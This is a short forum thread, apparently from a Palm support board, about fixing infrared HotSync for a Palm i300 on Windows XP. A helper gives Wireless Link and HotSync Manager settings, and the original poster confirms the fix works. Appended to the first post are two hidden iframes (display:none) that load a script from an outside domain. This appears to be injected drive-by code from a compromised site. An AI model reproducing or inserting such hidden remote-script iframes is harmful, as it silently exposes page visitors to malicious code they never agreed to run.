+ Reply to Thread
Results 1 to 5 of 5
  1. #1
    Registered User
    Join Date
    10-20-2001
    Posts
    55

    IR Hotsync Problems

    Hello,

    I am having a problem with the Hotsync operation using the IR port. I can sync my I300 when it is in the cradle, but does not seem to work when I try it with the IR port setting. I have a good connection through the IR port on my computer... and i shows the Wireless link icon and menu, but it will not allow the sync operation. Do I need to configure a COM port to accept the IR connections?

    I am using Windows XP... Does this matter?

    Any help would be appreciated.

    Thanks,

    Russ<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    10-22-2001
    Location
    NC
    Posts
    284

    Re: IR Hotsync Problems

    Originally posted by russdog
    Hello,

    I am having a problem with the Hotsync operation using the IR port. I can sync my I300 when it is in the cradle, but does not seem to work when I try it with the IR port setting. I have a good connection through the IR port on my computer... and i shows the Wireless link icon and menu, but it will not allow the sync operation. Do I need to configure a COM port to accept the IR connections?

    I am using Windows XP... Does this matter?

    Any help would be appreciated.

    Thanks,

    Russ
    Go into the Control Panel->Wireless Link, Image Transfer tab, turn off the "Use Wireless Link to transfer images from a digital camera...". At least this is the procedure for Win2K.

    Also, right mouse the HotSync icon in the system tray and make sure I/R is checked.

  3. #3
    Registered User
    Join Date
    10-20-2001
    Posts
    55
    I think you found my probelm! I do not have the IR choice on the hotsync system tray!

    Any ideas of hot to find that?

    Thanks!

  4. #4
    Registered User
    Join Date
    10-22-2001
    Location
    NC
    Posts
    284
    Originally posted by russdog
    I think you found my probelm! I do not have the IR choice on the hotsync system tray!

    Any ideas of hot to find that?

    Thanks!
    First, you must stop and start the HotSync Manager after doing that setting change I told you about earlier.

    Second, make sure you are running Palm Desktop 4.01. Get it from www.palm.net, or wherever.

  5. #5
    Registered User
    Join Date
    10-20-2001
    Posts
    55
    it works!!!! Thanks for all your help!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts